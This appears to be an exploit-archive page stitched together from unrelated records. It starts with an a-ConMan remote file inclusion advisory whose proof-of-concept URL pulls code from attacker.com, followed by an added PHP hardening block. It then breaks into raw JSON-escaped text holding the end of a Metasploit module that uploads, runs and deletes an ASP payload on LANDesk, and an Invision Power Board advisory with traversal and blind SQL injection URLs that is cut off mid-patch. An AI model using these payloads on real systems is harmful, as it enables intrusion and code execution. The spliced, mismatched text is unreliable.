ID : 1337DAY-ID-1195
Type : zdt
Reporter : Matdhule
Modified : 2006-11-22T00:00:00
Description : Exploit for unknown platform in category web applications
=====================================================================
a-ConMan <= 3.2b (common.inc.php) Remote File Inclusion Vulnerability
=====================================================================
ECHO_ADV_61$2006
------------------------------------------------------------------------------
[ECHO_ADV_61$2006] a-ConMan <= v3.2beta Remote File Inclusion
------------------------------------------------------------------------------
Author : Ahmad Maulana a.k.a Matdhule
Date Found : November, 22nd 2006
Location : Indonesia, Jakarta
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
a-ConMan (Automated Content Management)
Application : a-ConMan (Automated Content Management)
version : 3.2beta
URL : http://sourceforge.net/projects/a-conman
a-ConMan is a flexible database solution built to categorize and manage your image and video content, giving you the ability to automate the building and updating of any type of content-specific website within seconds. Utilizing one of the most advanced
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
I found a vulnerability in the script common.inc.php
-----------------------common.inc.php----------------------
....
<?php
include_once($cm_basedir."/ez_sql.php");
include_once($cm_basedir."/pg2ezsql.php");
// include_once($cm_basedir."/functions.php");
$ver = "3.1.1228";
...
----------------------------------------------------------
Input passed to the "cm_basedir" parameter in common.inc.php is not
properly verified before being used as the directory prefix in
include_once(). This can be exploited to execute arbitrary PHP code by
including files from local or external resources.
Proof Of Concept:
~~~~~~~~~~~~~~~
http://target.com/[a-conman_path]/php.incs/common.inc.php?cm_basedir=http://attacker.com/inject.txt?
Solution:
~~~~~~~
- Sanitize variable $cm_basedir on common.inc.php.
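One way to apply that fix, as an added example and not the a-ConMan project's own code: the include block from common.inc.php rewritten so that $cm_basedir is derived from the file's own location and never from the request. It assumes common.inc.php sits in <a-conman_path>/php.incs next to ez_sql.php and pg2ezsql.php, as the PoC URL suggests; the CM_BASEDIR_CONFIG constant and the cm_safe_basedir() helper are hypothetical names introduced here.

```php
<?php
// Hardened replacement for the include block of common.inc.php
// (added example, not the project's code).
//
// Why the original is exploitable: the snippet never initialises
// $cm_basedir itself. With register_globals=On (common on PHP 4 / early
// PHP 5 installs of 2006) a request parameter ?cm_basedir=http://.../
// becomes that variable, and include_once() fetches and runs remote code.
// With remote URLs disabled, a local path can still be included (LFI).

// Fix 1: take the base directory from the location of this file, not from
// any variable that may have been populated by the request.
// Assumption: this file lives in <a-conman_path>/php.incs together with
// ez_sql.php and pg2ezsql.php. (On PHP < 5.3 use dirname(__FILE__).)
$cm_basedir = __DIR__;

// Fix 2: if a deployment must read the base directory from a trusted
// config file (hypothetical constant CM_BASEDIR_CONFIG), validate it
// before it reaches include_once().
function cm_safe_basedir($candidate, $install_root)
{
    // Null bytes truncated paths in old PHP versions; refuse them outright.
    if (!is_string($candidate) || strpos($candidate, "\0") !== false) {
        return false;
    }
    // Refuse any stream wrapper (http://, ftp://, php://, phar://, data://).
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $candidate)) {
        return false;
    }
    // realpath() resolves ../ and symlinks and returns false for anything
    // that is not an existing local filesystem path.
    $real = realpath($candidate);
    $root = realpath($install_root);
    if ($real === false || $root === false || !is_dir($real)) {
        return false;
    }
    // The directory must be the install root itself or live beneath it.
    $root_prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strpos($real . DIRECTORY_SEPARATOR, $root_prefix) !== 0) {
        return false;
    }
    return $real;
}

if (defined('CM_BASEDIR_CONFIG')) {
    $checked = cm_safe_basedir(CM_BASEDIR_CONFIG, dirname(__DIR__));
    if ($checked === false) {
        // Fail closed; never fall back to a request-controlled value.
        header('HTTP/1.1 500 Internal Server Error');
        exit('a-ConMan: invalid cm_basedir configuration');
    }
    $cm_basedir = $checked;
}

include_once($cm_basedir . "/ez_sql.php");
include_once($cm_basedir . "/pg2ezsql.php");
// include_once($cm_basedir . "/functions.php");
$ver = "3.1.1228";
```

Independently of the code change, setting register_globals = Off and allow_url_include = Off (PHP 5.2 and later) in php.ini stops request parameters from becoming variables and stops include_once() from opening remote URLs at all.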
---------------------------------------------------------------------------
Shoutz:
~~~
~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,str0ke
~ bius, lapets, BlueSpy, NpR, h4ntu, thama, Fungky
-------------------------------- [ EOF ]----------------------------------
# 0day.today [2018-04-08] #
containing the payload\r\n exe = generate_payload_exe\r\n asp = Msf::Util::EXE.to_exe_asp(exe)\r\n \r\n # htmlentities like encoding\r\n asp = asp.gsub(\"&\", \"&amp;\").gsub(\"\\\"\", \"&quot;\").gsub(\"'\", \"&#39;\").gsub(\"<\", \"&lt;\").gsub(\">\", \"&gt;\")\r\n \r\n uri_path = (datastore['PATH'][-1,1] == \"/\" ? datastore['PATH'] : datastore['PATH'] + \"/\")\r\n upload_random = rand_text_alpha(rand(6) + 6)\r\n upload_xml_path = \"ldlogon\\\\#{upload_random}.asp\"\r\n \r\n soap = <<-eos\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <RunAMTCommand xmlns=\"http://tempuri.org/\">\r\n <Command>-PutUpdateFileCore</Command>\r\n <Data1>#{rand_text_alpha(rand(4) + 4)}</Data1>\r\n <Data2>#{upload_xml_path}</Data2>\r\n <Data3>#{asp}</Data3>\r\n <ReturnString>#{rand_text_alpha(rand(4) + 4)}</ReturnString>\r\n </RunAMTCommand>\r\n </soap:Body>\r\n</soap:Envelope>\r\n eos\r\n \r\n #\r\n # UPLOAD\r\n #\r\n attack_url = uri_path + \"landesk/managementsuite/core/core.anonymous/ServerSetup.asmx\"\r\n print_status(\"#{peer} - Uploading #{asp.length} bytes through #{attack_url}...\")\r\n \r\n res = send_request_cgi({\r\n 'uri' => attack_url,\r\n 'method' => 'POST',\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'headers' => {\r\n 'SOAPAction' => \"\\\"http://tempuri.org/RunAMTCommand\\\"\",\r\n },\r\n 'data' => soap,\r\n }, 20)\r\n \r\n if (! 
res)\r\n print_status(\"#{peer} - Timeout: Trying to execute the payload anyway\")\r\n elsif (res.code < 200 or res.code >= 300)\r\n print_error(\"#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]\")\r\n return\r\n end\r\n \r\n #\r\n # EXECUTE\r\n #\r\n upload_path = uri_path + \"ldlogon/#{upload_random}.asp\"\r\n print_status(\"#{peer} - Executing #{upload_path}...\")\r\n \r\n res = send_request_cgi({\r\n 'uri' => upload_path,\r\n 'method' => 'GET'\r\n }, 20)\r\n \r\n if (! res)\r\n print_error(\"#{peer} - Execution failed on #{upload_path} [No Response]\")\r\n return\r\n end\r\n \r\n if (res.code < 200 or res.code >= 300)\r\n print_error(\"#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]\")\r\n return\r\n end\r\n \r\n \r\n #\r\n # DELETE\r\n #\r\n soap = <<-eos\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <SetTaskLogByFile xmlns=\"http://tempuri.org/\">\r\n <computerIdn>1</computerIdn>\r\n <taskid>1</taskid>\r\n <filename>../#{upload_random}.asp</filename>\r\n </SetTaskLogByFile>\r\n </soap:Body>\r\n</soap:Envelope>\r\n eos\r\n \r\n attack_url = uri_path + \"WSVulnerabilityCore/VulCore.asmx\"\r\n print_status(\"#{peer} - Deleting #{upload_path} through #{attack_url}...\")\r\n \r\n res = send_request_cgi({\r\n 'uri' => attack_url,\r\n 'method' => 'POST',\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'headers' => {\r\n 'SOAPAction' => \"\\\"http://tempuri.org/SetTaskLogByFile\\\"\",\r\n },\r\n 'data' => soap,\r\n }, 20)\r\n \r\n if (! 
res)\r\n print_error(\"#{peer} - Deletion failed at #{attack_url} [No Response]\")\r\n return\r\n elsif (res.code < 200 or res.code >= 300)\r\n print_error(\"#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]\")\r\n return\r\n end\r\n \r\n handler\r\n end\r\n \r\nend\r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18006"}, {"lastseen": "2018-04-05T21:45:26", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 2, "reporter": "Dawid Golunski", "published": "2009-12-04T00:00:00", "title": "Invision Power Board <= 3.0.4 LFI / 2.3.6 ; 3.0.4 SQL Injection", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-05T21:45:26", "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/", "value": 9.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-12-04T00:00:00", "id": "1337DAY-ID-10083", "href": "https://0day.today/exploit/description/10083", "sourceData": "===============================================================\r\nInvision Power Board <= 3.0.4 LFI / 2.3.6 ; 3.0.4 SQL Injection\r\n===============================================================\r\n\r\n=============================================\r\n- Severity: Moderately High\r\n=============================================\r\n \r\nI. VULNERABILITY\r\n-------------------------\r\nInvision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection\r\nInvision Power Board <= 2.3.6 SQL Injection\r\n \r\nII. BACKGROUND\r\n-------------------------\r\n \r\nInvision Power Board (IPB) is a professional forum system that has been built from the ground up with speed and security in mind, taking advantage of object-oriented code, highly-optimized SQL queries, and the fast PHP engine. A comprehensive administration control panel is included to help you keep your board running smoothly. 
Moderators will also enjoy the full range of options available to them via built-in tools and the moderators' control panel. Members will appreciate the ability to subscribe to topics, send private messages, and perform a host of other options through the user control panel.\r\n \r\nIII. INTRODUCTION\r\n-------------------------\r\n \r\nFor a good understanding of the vulnerabilities it is necessary to be familiar with the way IPB handles input data. Below is a quick trace of the input validation process. The code snippets come from IPB version 3.0.4.\r\n \r\nline | file: admin/sources/base/ipsRegistry.php\r\n352 | static public function init()\r\n353 | {\r\n... |\r\n... |\r\n462 | IPSLib::cleanGlobals( $_GET );\r\n463 | IPSLib::cleanGlobals( $_POST );\r\n464 | IPSLib::cleanGlobals( $_COOKIE );\r\n465 | IPSLib::cleanGlobals( $_REQUEST );\r\n466 |\r\n467 | # GET first\r\n468 | $input = IPSLib::parseIncomingRecursively( $_GET, array() );\r\n469 |\r\n470 | # Then overwrite with POST\r\n471 | self::$request = IPSLib::parseIncomingRecursively( $_POST, $input );\r\n... |\r\n \r\nThe init() function cleans the input data passed via GET, POST and the other request arrays at the start of each request, before any of the input variables are processed.\r\n \r\nLet's look into the sanitization performed by the cleanGlobals function:\r\n \r\nline | file: admin/sources/base/core.php\r\n1644 | static public function cleanGlobals( &$data, $iteration = 0 )\r\n1645 | {\r\n... 
|\r\n1654 | foreach( $data as $k => $v )\r\n1655 | {\r\n1656 | if ( is_array( $v ) )\r\n1657 | {\r\n1658 | self::cleanGlobals( $data[ $k ], ++ $iteration );\r\n1659 | }\r\n1660 | else\r\n1661 | {\r\n1662 | # Null byte characters\r\n1663 | $v = str_replace( chr('0') , '', $v );\r\n1664 | $v = str_replace( \"\\0\" , '', $v );\r\n1665 | $v = str_replace( \"\\x00\" , '', $v );\r\n1666 | $v = str_replace( '%00' , '', $v );\r\n1667 |\r\n1668 | # File traversal\r\n1669 | $v = str_replace( \"../\", \"&#46;&#46;/\", $v );\r\n1670 |\r\n1671 | $data[ $k ] = $v;\r\n1672 | }\r\n1673 | }\r\n1674 | }\r\n \r\nAs we can see, the function strips null characters from incoming data and rewrites \"../\" sequences into HTML entities to prevent unwanted file inclusion.\r\n \r\nThe next function that affects the input is:\r\n \r\nline | file: admin/sources/base/core.php\r\n1573 | static public function parseIncomingRecursively( &$data, $input=array(), $iteration = 0 )\r\n1574 | {\r\n... |\r\n1583 | foreach( $data as $k => $v )\r\n1584 | {\r\n1585 | if ( is_array( $v ) )\r\n1586 | {\r\n1587 | $input[ $k ] = self::parseIncomingRecursively( $data[ $k ], array(), ++$iteration );\r\n1588 | }\r\n1589 | else\r\n1590 | {\r\n1591 | $k = IPSText::parseCleanKey( $k );\r\n1592 | $v = IPSText::parseCleanValue( $v, false );\r\n1593 |\r\n1594 | $input[ $k ] = $v;\r\n1595 | }\r\n1596 | }\r\n1597 |\r\n1598 | return $input;\r\n1599 | }\r\n \r\nThe purpose of this function is to clean the key/value pairs of the array passed to it with the help of the parseCleanKey and parseCleanValue functions. The first one can be skipped, as neither of the attacks described later on requires special characters inside variable names. 
The other looks as follows:\r\n \r\nline | file: admin/sources/base/core.php\r\n4100 | static public function parseCleanValue( $val, $postParse=true )\r\n4101 | {\r\n4102 | if ( $val == \"\" )\r\n4103 | {\r\n4104 | return \"\";\r\n4105 | }\r\n4106 |\r\n4107 | $val = str_replace( \"&#032;\", \" \", IPSText::stripslashes($val) );\r\n4108 |\r\n4109 | # Convert all carriage return combos\r\n4110 | $val = str_replace( array( \"\\r\\n\", \"\\n\\r\", \"\\r\" ), \"\\n\", $val );\r\n4111 |\r\n4112 | $val = str_replace( \"&\", \"&amp;\", $val );\r\n4113 | $val = str_replace( \"<!--\", \"&#60;&#33;--\", $val );\r\n4114 | $val = str_replace( \"-->\", \"--&#62;\", $val );\r\n4115 | $val = str_ireplace( \"<script\", \"&#60;script\", $val );\r\n4116 | $val = str_replace( \">\", \"&gt;\", $val );\r\n4117 | $val = str_replace( \"<\", \"&lt;\", $val );\r\n4118 | $val = str_replace( '\"', \"&quot;\", $val );\r\n4119 | $val = str_replace( \"\\n\", \"<br />\", $val ); // Convert literal newlines\r\n4120 | $val = str_replace( \"$\", \"&#036;\", $val );\r\n4121 | $val = str_replace( \"!\", \"&#33;\", $val );\r\n4122 | $val = str_replace( \"'\", \"&#39;\", $val ); // IMPORTANT: It helps to increase sql query safety.\r\n4123 |\r\n4124 | if ( IPS_ALLOW_UNICODE )\r\n... |\r\n \r\nThe function rewrites the characters typically used in XSS and SQL injection attacks into HTML entities. Note that it leaves \".\", \"/\" and spaces untouched, so on its own it is no defence against directory traversal.\r\n \r\nThe resulting array containing the sanitized input data from the GET/POST methods is stored in the ipsRegistry::$request array (as we can see in the first code listing).\r\n \r\nIV. LOCAL FILE INCLUSION VULNERABILITY\r\n-------------------------\r\n \r\n1. 
Description.\r\n \r\nIt is possible to include an arbitrary php file stored anywhere on the server (where it is readable by the php/web server process) by exploiting the following code of IPB 3.0.4:\r\n \r\nline | file: admin/sources/base/ipsController.php\r\n142 | public function getCommand( ipsRegistry $registry )\r\n143 | {\r\n144 | $_NOW = IPSDebug::getMemoryDebugFlag();\r\n145 |\r\n146 | $module = ipsRegistry::$current_module;\r\n147 | $section = ipsRegistry::$current_section;\r\n148 | $filepath = IPSLib::getAppDir( IPS_APP_COMPONENT ) . '/' . self::$modules_dir . '/' . $module . '/';\r\n149 |\r\n150 | /* Got a section? */\r\n151 | if ( ! $section )\r\n152 | {\r\n153 | if ( file_exists( $filepath . 'defaultSection.php' ) )\r\n154 | {\r\n155 | $DEFAULT_SECTION = '';\r\n156 | require( $filepath . 'defaultSection.php' );\r\n157 |\r\n158 | if ( $DEFAULT_SECTION )\r\n159 | {\r\n160 | $section = $DEFAULT_SECTION;\r\n161 | }\r\n162 | }\r\n163 | }\r\n164 |\r\n165 | $classname = self::$class_dir . '_' . IPS_APP_COMPONENT . '_' . $module . '_' . $section;\r\n166 |\r\n167 | if ( file_exists( $filepath . 'manualResolver.php' ) )\r\n168 | {\r\n169 | require_once( $filepath . 'manualResolver.php' );\r\n170 | $classname = self::$class_dir . '_' . IPS_APP_COMPONENT . '_' . $module . '_manualResolver';\r\n171 | }\r\n172 | else if ( file_exists( $filepath . $section . '.php' ) )\r\n173 | {\r\n174 | require_once( $filepath . $section . '.php' );\r\n175 | }\r\n... |\r\n \r\nThe require_once call on line 174 uses the variable $section to build the path of the php file to be included (the file_exists check on line 172 only confirms that the traversed path exists; it does not constrain it). The variable is assigned the following value:\r\n \r\nline | file: admin/sources/base/ipsRegistry.php\r\n1654 | ipsRegistry::$current_section = ( ipsRegistry::$request['section'] ) ? 
ipsRegistry::$request['section'] : '';\r\n \r\nwhich, as we know from the introduction, comes from a user-supplied variable (via the GET or POST method).\r\n \r\nAlthough the whole $request array has been filtered to prevent directory traversal and arbitrary file inclusion, it is possible to evade these measures due to a bug in the function implementing the \"friendly URLs\" feature introduced in version 3.0.0 of the IPB forum.\r\n \r\nline | file: admin/sources/base/ipsRegistry.php\r\n1188 | private static function _fUrlInit()\r\n1189 | {\r\n... |\r\n1195 | if ( ipsRegistry::$settings['use_friendly_urls'] )\r\n1196 | {\r\n... |\r\n... |\r\n1235 | $uri = $_SERVER['REQUEST_URI'] ? $_SERVER['REQUEST_URI'] : @getenv('REQUEST_URI');\r\n1236 |\r\n1237 | $_toTest = $uri; //( $qs ) ? $qs : $uri;\r\n... |\r\n... |\r\n... |\r\n1306 | //-----------------------------------------\r\n1307 | // If using query string furl, extract any\r\n1308 | // secondary query string.\r\n1309 | // Ex: http://localhost/index.php?/path/file.html?key=value\r\n1310 | // Will pull the key=value properly\r\n1311 | //-----------------------------------------\r\n1312 |\r\n1313 | if( substr_count( $_toTest, '?' ) > 1 )\r\n1314 | {\r\n1315 | $_secondQueryString = substr( $_toTest, strrpos( $_toTest, '?' ) + 1 );\r\n1316 | $_secondParams = explode( '&', $_secondQueryString );\r\n1317 |\r\n1318 | if( count($_secondParams) )\r\n1319 | {\r\n1320 | foreach( $_secondParams as $_param )\r\n1321 | {\r\n1322 | list( $k, $v ) = explode( '=', $_param );\r\n1323 |\r\n1324 | $k = IPSText::parseCleanKey( $k );\r\n1325 | $v = IPSText::parseCleanValue( $v );\r\n1326 |\r\n1327 | $_GET[ $k ] = $v;\r\n1328 | $_REQUEST[ $k ] = $v;\r\n1329 | $_urlBits[ $k ] = $v;\r\n1330 |\r\n1331 | ipsRegistry::$request[ $k ] = $v;\r\n1332 | }\r\n1333 | }\r\n1334 | }\r\n1335 | }\r\n... 
|\r\n \r\nThe above code allows for a secondary query string from which additional variables are retrieved and saved in the $request array as well as in the $_GET and $_REQUEST globals. It takes the query string from a global that has not been cleaned, $_SERVER['REQUEST_URI'], and neither checks whether the variables supplied in the request URI already exist in any of those arrays nor calls the cleanGlobals function to sanitize the values (parseCleanValue on line 1325 encodes HTML and quote characters only and leaves \"../\" intact). Note that the listing places this code inside the if ( ipsRegistry::$settings['use_friendly_urls'] ) block on line 1195, so the friendly URL feature must be enabled for the path to be reachable.\r\n \r\nA variable named 'section' can be passed in the secondary query string in order to bypass the filtering of \"../\" and %00 sequences, effectively allowing an attacker to traverse directories and include any php file on the system, leading to a local file inclusion attack.\r\n \r\nNote: Omitting the '.php' extension (to include an arbitrary file like /etc/passwd) by using a NULL character is not possible in this case, as the %00 sequence in REQUEST_URI is not decoded by the web server and there is no urldecode call to decode it before require_once either.\r\n \r\nVersions older than 3.0.4 have a different implementation of the friendly URL feature, but are vulnerable in the same way.\r\n \r\n2. Proof of concept.\r\n \r\nThis issue is trivial to exploit with a web browser and a known location of a php file residing on the target system. Authorisation is not required.\r\n \r\nFor example, the following URL in case of IPB 3.0.4:\r\n \r\nhttp://server-with-ipb-forum-3.0.4.com/forum/index.php?app=core&module=global&section=register&any=?section=../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/inc\r\n \r\nor the following in case of versions older than IPB 3.0.4:\r\n \r\nhttp://server-with-ipb-forum-3.0.[0-3].com/forum/index.php?
app=core&module=global&section=register/register/page__section__../../../../../../../../../../../../../../../../../../../../../tmp/inc__\r\n \r\nwill result in the /tmp/inc.php file being included and the code it contains being executed.\r\n \r\nV. SQL INJECTION VULNERABILITY\r\n-------------------------\r\n \r\n1. Description.\r\n \r\nAn SQL Injection attack is possible due to insufficient sanitization in the following function:\r\n \r\nline | file: admin/applications/forums/sources/classes/moderate.php\r\n1820 | /**\r\n1821 | * Create 'where' clause for SQL forum pruning\r\n1822 | *\r\n1823 | * @access public\r\n1824 | * @return boolean\r\n1825 | */\r\n1826 | public function sqlPruneCreate( $forum_id, $starter_id=\"\", $topic_state=\"\", $post_min=\"\", $date_exp=\"\", $ignore_pin=\"\" )\r\n1827 | {\r\n1828 | $sql = 'forum_id=' . intval($forum_id);\r\n1829 |\r\n1830 | if ( intval($date_exp) )\r\n1831 | {\r\n1832 | $sql .= \" AND last_post < {$date_exp}\";\r\n1833 | }\r\n1834 |\r\n1835 | if ( intval($starter_id) )\r\n1836 | {\r\n1837 | $sql .= \" AND starter_id={$starter_id}\";\r\n1838 |\r\n1839 | }\r\n1840 |\r\n1841 | if ( intval($post_min) )\r\n1842 | {\r\n1843 | $sql .= \" AND posts < {$post_min}\";\r\n1844 | }\r\n1845 |\r\n1846 | if ($topic_state != 'all')\r\n1847 | {\r\n1848 | if ($topic_state)\r\n1849 | {\r\n1850 | $sql .= \" AND state='{$topic_state}'\";\r\n1851 | }\r\n1852 | }\r\n1853 |\r\n1854 | if ( $ignore_pin != \"\" )\r\n1855 | {\r\n1856 | $sql .= \" AND pinned=0\";\r\n1857 | }\r\n1858 |\r\n1859 |\r\n1860 | return $sql;\r\n1861 | }\r\n \r\nAll of the IF statements with intval() are meant to ensure that the arguments passed to the function are numeric before they are placed inside the WHERE clause of a query. Note, however, that only the test uses intval(); the concatenations on lines 1832, 1837 and 1843 interpolate the original, unconverted string.\r\n \r\nBecause of the way intval() works, it is possible to fool the function by passing a string like '1 OR sleep(5)'. 
In such a case intval() returns 1, which satisfies the IF condition and causes the whole string to be placed inside the query.\r\n \r\nThe sqlPruneCreate function is used twice in the code that performs moderator tasks. One invocation of it can be found in:\r\n \r\nline | file: admin/applications/forums/modules_public/moderate/moderate.php\r\n2323 | protected function _pruneMove()\r\n2324 | {\r\n2325 | //-----------------------------------------\r\n2326 | // Check\r\n2327 | //-----------------------------------------\r\n2328 |\r\n2329 | $this->_resetModerator( $this->topic['forum_id'] );\r\n2330 |\r\n2331 | $this->_genericPermissionCheck( 'mass_move' );\r\n2332 |\r\n2333 | ///-----------------------------------------\r\n2334 | // SET UP\r\n2335 | //-----------------------------------------\r\n2336 |\r\n2337 | $pergo = intval( $this->request['pergo'] ) ? intval( $this->request['pergo'] ) : 50;\r\n2338 | $max = intval( $this->request['max'] );\r\n2339 | $current = intval($this->request['current']);\r\n2340 | $maxdone = $pergo + $current;\r\n2341 | $tid_array = array();\r\n2342 | $starter = trim( $this->request['starter'] );\r\n2343 | $state = trim( $this->request['state'] );\r\n2344 | $posts = intval( $this->request['posts'] );\r\n2345 | $dateline = intval( $this->request['dateline'] );\r\n2346 | $source = $this->forum['id'];\r\n2347 | $moveto = intval($this->request['df']);\r\n2348 | $date = 0;\r\n2349 | $ignore_pin = intval( $this->request['ignore_pin'] );\r\n2350 |\r\n2351 | if( $dateline )\r\n2352 | {\r\n2353 | $date = time() - $dateline*60*60*24;\r\n2354 | }\r\n2355 |\r\n2356 | //-----------------------------------------\r\n2357 | // Carry on...\r\n2358 | //-----------------------------------------\r\n2359 |\r\n2360 | $dbPruneWhere = $this->modLibrary->sqlPruneCreate( $this->forum['id'], $starter, $state, $posts, $date, $ignore_pin );\r\n2361 |\r\n2362 | $this->DB->build( array(\r\n2363 | 'select' => 
'tid',\r\n2364 | 'from' => 'topics',\r\n2365 | 'where' => $dbPruneWhere,\r\n2366 | 'limit' => array( 0, $pergo ),\r\n2367 | ) );\r\n2368 | $batch = $this->DB->execute();\r\n... |\r\n \r\nAs we can see, there are two variables that come from the user and are not converted to a number before they are passed to the sqlPruneCreate function: $starter and $state.\r\n \r\nThe second variable cannot be used for SQL injection, as sqlPruneCreate treats it as a string and wraps it in single quotes, and parseCleanValue (section III) has already rewritten any quote in the input to &#39;. A string passed in the $starter variable, however, is placed unquoted in the query as long as its first character is a digit, allowing a logged-in moderator to perform an SQL injection attack.\r\n \r\nThe vulnerability is somewhat tricky to exploit, as there are quite a few restrictions that make creating a successful SQL attack vector difficult. Only the WHERE clause can be controlled, quotes are filtered, and UNION or sub-selects are prohibited too (at least in the case of the MySQL driver). To top it all, the results of the query are not output to the browser, so it will have to be a blind injection.\r\n \r\nNevertheless, a crafty attacker might issue a series of requests that allow him to gain some information about the target system, or even read files from the disk depending on the permissions granted to the DB account used by the forum. Other attacks might also be possible when a database engine other than MySQL is used.\r\n \r\n2. 
Proof of concept.\r\n \r\nIf a logged-in user with moderator privileges requests a URL like:\r\n \r\nhttp://server-with-ipb-3.x.x-forum.com/forum/?app=forums&module=moderate&section=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20--%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd\r\n \r\nin case of IPB 3.x, or:\r\n \r\nhttp://server-with-ipb-2.x.x-forum.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(16)%20--%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c\r\n \r\nin case of IPB 2.x.\r\n \r\nA query similar to:\r\n \r\nSELECT tid FROM ibftopics WHERE forum_id=1 AND starter_id=1 AND starter_id=1 OR substr(version(),1,1)=5 AND sleep(15) -- skip AND state='open' AND pinned=0\r\n \r\nLIMIT 0,50\r\n \r\nwill be run against the database.\r\n \r\nThe query checks whether the major version of the MySQL server is 5. If that is the case, the sleep function is run, which delays the page load by 15 seconds and thus reveals the result of the query (the trailing \"-- skip\" comments out the rest of the WHERE clause that sqlPruneCreate appends on the same line).\r\n \r\nFor this to work a valid auth_key needs to be supplied (it can be obtained by going to any of the forums, clicking the Forum Management button and selecting the Prune/Mass Move feature). The Source ($f) and Destination ($df) forum parameters in the URL might also need adjusting.\r\n \r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n \r\nThe Local PHP File Inclusion vulnerability can be especially dangerous in a shared hosting environment. 
Even if the server has been configured to prevent users from reading each other's document roots (web server/PHP process running in the context of the site's owner), an attacker with an account on the same server as the targeted site could use the vulnerability to place a php file in a shared directory like /tmp and cause the IPB forum on the target to execute his code, thus gaining access equivalent to that of the owner of the website.\r\n \r\nThe SQL Injection vulnerability is only a threat if there are moderators on the forum who cannot be fully trusted, or if an attacker manages to steal or guess their passwords. The possible consequences of a successful exploitation of this flaw have been described in the previous section.\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nAll of the IPB versions of the 3.x series (including the newest release, 3.0.4) are affected by the Local PHP File Inclusion and SQL Injection vulnerabilities.\r\n \r\nProbably most if not all IPB releases of the 2.x series (including 2.3.6) are affected by the SQL Injection vulnerability.\r\n \r\nVIII. 
SOLUTION\r\n-------------------------\r\n \r\nVendor has been informed about the vulnerabilities and should be releasing\r\n \r\npatches soon.\r\n \r\n \r\nI attach 2 patches for the current versions of both 2.x and 3.x series that\r\n \r\ncan be used as a temporary solution.\r\n \r\nIPB 3.0.4 patch:\r\n \r\n \r\ndiff -Nprub ipb304/admin/applications/forums/sources/classes/ moderate.php ipb304-patched/admin/applications/forums/sources/classes/ moderate.php --- ipb304/admin/applications/forums/sources/classes/moderate.php 2009-10-08 16:34:50.000000000 +0100 +++ ipb304-patched/admin/applications/forums/sources/classes/ moderate.php 2009-11-29 01:01:49.000000000 +0000\r\n \r\n@@ -1829,18 +1829,18 @@ class moderatorLibrary\r\n \r\n if ( intval($date_exp) )\r\n {\r\n- $sql .= \" AND last_post < {$date_exp}\";\r\n+ $sql .= \" AND last_post < \". intval($date_exp);\r\n }\r\n \r\n if ( intval($starter_id) )\r\n {\r\n- $sql .= \" AND starter_id={$starter_id}\";\r\n+ $sql .= \" AND starter_id=\". intval($starter_id);\r\n \r\n }\r\n \r\n if ( intval($post_min) )\r\n {\r\n- $sql .= \" AND posts < {$post_min}\";\r\n+ $sql .= \" AND posts < \". intval($post_min);\r\n }\r\n \r\n if ($topic_state != 'all')\r\n \r\ndiff -Nprub ipb304/admin/sources/base/ipsRegistry.php ipb304-patched/ admin/sources/base/ipsRegistry.php --- ipb304/admin/sources/base/ipsRegistry.php 2009-10-08 16:34:24.000000000 +0100 +++ ipb304-patched/admin/sources/base/ipsRegistry.php 2009-11-29 00:57:13.000000000 +0000\r\n \r\n@@ -479,6 +479,9 @@ class ipsRegistry\r\n \r\n \r\n/* First pass of app set up. 
